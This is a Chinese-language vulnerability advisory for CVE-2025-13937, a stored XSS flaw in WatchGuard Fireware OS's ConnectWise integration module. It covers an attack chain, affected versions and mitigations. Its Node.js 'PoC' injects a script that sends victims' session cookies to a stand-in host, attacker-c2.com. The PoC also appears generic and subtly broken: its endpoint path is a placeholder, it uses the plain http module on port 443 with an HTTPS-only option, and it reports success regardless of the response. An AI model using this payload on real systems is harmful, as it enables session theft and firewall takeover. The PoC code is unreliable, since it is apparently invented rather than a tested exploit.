CVE-2025-13937 WatchGuard Fireware OS存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13937

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WatchGuard Fireware OS (ConnectWise Technology Integration module)

漏洞概述

CVE-2025-13937是WatchGuard Fireware OS中发现的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于ConnectWise Technology Integration模块中，由于该模块在处理用户输入时未能正确对特殊字符进行过滤和转义，导致攻击者可以注入恶意JavaScript代码。这些恶意代码会被永久存储在服务器端，当其他用户访问受影响页面时，恶意脚本会在其浏览器上下文中执行。攻击者可利用此漏洞窃取会话Cookie、劫持用户会话、进行钓鱼攻击或修改页面内容。该漏洞的CVSS评分为6.1，属于中危级别，攻击复杂度低，无需认证即可实施攻击，但需要用户交互才能触发。由于是存储型XSS，攻击的隐蔽性较高，恶意代码可能在系统中存在较长时间才被发现。WatchGuard Fireware OS是一款企业级防火墙操作系统，广泛部署于企业网络安全边界，该漏洞可能影响大量企业的网络安全。

技术细节

该存储型XSS漏洞的根本原因在于WatchGuard Fireware OS的ConnectWise Technology Integration模块在Web页面生成过程中，未能对用户可控输入进行充分的输入验证和输出编码。攻击者可以通过向ConnectWise集成模块提交包含恶意JavaScript代码的请求，这些代码会被存储在数据库或配置文件中。当管理员或授权用户访问相关管理界面时，后端系统会从存储中读取这些未经过滤的数据并嵌入到HTML响应中。浏览器在解析页面时会执行这些恶意脚本代码。由于ConnectWise集成模块通常具有较高的权限级别，攻击者成功利用此漏洞后可能获取管理员权限或敏感配置信息。攻击者常利用此漏洞窃取管理员会话Cookie，进而接管整个防火墙设备，修改安全策略或进行内网横向移动。该漏洞影响Fireware OS 12.4至12.11.4、12.5至12.5.13以及2025.1至2025.1.2版本。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标WatchGuard Fireware OS版本，确认其运行ConnectWise Technology Integration模块

STEP 2

Payload Preparation

攻击者构造包含恶意JavaScript代码的XSS payload，用于窃取Cookie或执行恶意操作

STEP 3

Initial Exploitation

攻击者通过API或Web接口向ConnectWise集成模块提交恶意payload，该数据被存储在服务器端

STEP 4

Trigger

管理员或授权用户访问包含恶意脚本的页面，触发payload执行

STEP 5

Session Hijacking

恶意脚本窃取用户会话Cookie并发送至攻击者控制的服务器

STEP 6

Privilege Escalation

攻击者利用窃取的会话接管防火墙管理界面，进一步修改安全策略或内网横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13937 Stored XSS PoC
// Target: WatchGuard Fireware OS ConnectWise Integration Module
// Note: This PoC is for educational and authorized testing purposes only

const http = require('http');

const targetHost = 'target-firewall-ip';
const targetPort = 443;
const targetPath = '/connectwise/integration/endpoint';

// Malicious XSS payload - steals session cookies
const xssPayload = '<script>fetch("https://attacker-c2.com/steal?c="+document.cookie)</script>';

const postData = JSON.stringify({
    name: 'ConnectWise Integration',
    description: xssPayload,
    configuration: 'test'
});

const options = {
    hostname: targetHost,
    port: targetPort,
    path: targetPath,
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Content-Length': Buffer.byteLength(postData),
        'User-Agent': 'Mozilla/5.0'
    },
    rejectUnauthorized: false
};

const req = http.request(options, (res) => {
    console.log(`Status Code: ${res.statusCode}`);
    let data = '';
    res.on('data', (chunk) => { data += chunk; });
    res.on('end', () => {
        console.log('Response:', data);
        console.log('XSS payload sent successfully');
    });
});

req.on('error', (e) => {
    console.error(`Request error: ${e.message}`);
});

req.write(postData);
req.end();

影响范围

WatchGuard Fireware OS 12.4 through 12.11.4

WatchGuard Fireware OS 12.5 through 12.5.13

WatchGuard Fireware OS 2025.1 through 2025.1.2

防御指南

临时缓解措施

在官方补丁发布前，建议禁用不必要的ConnectWise Technology Integration功能，限制该模块的网络访问权限，加强Web应用防火墙规则以检测和拦截恶意脚本标签。同时监控防火墙管理界面的访问日志，及时发现异常访问行为。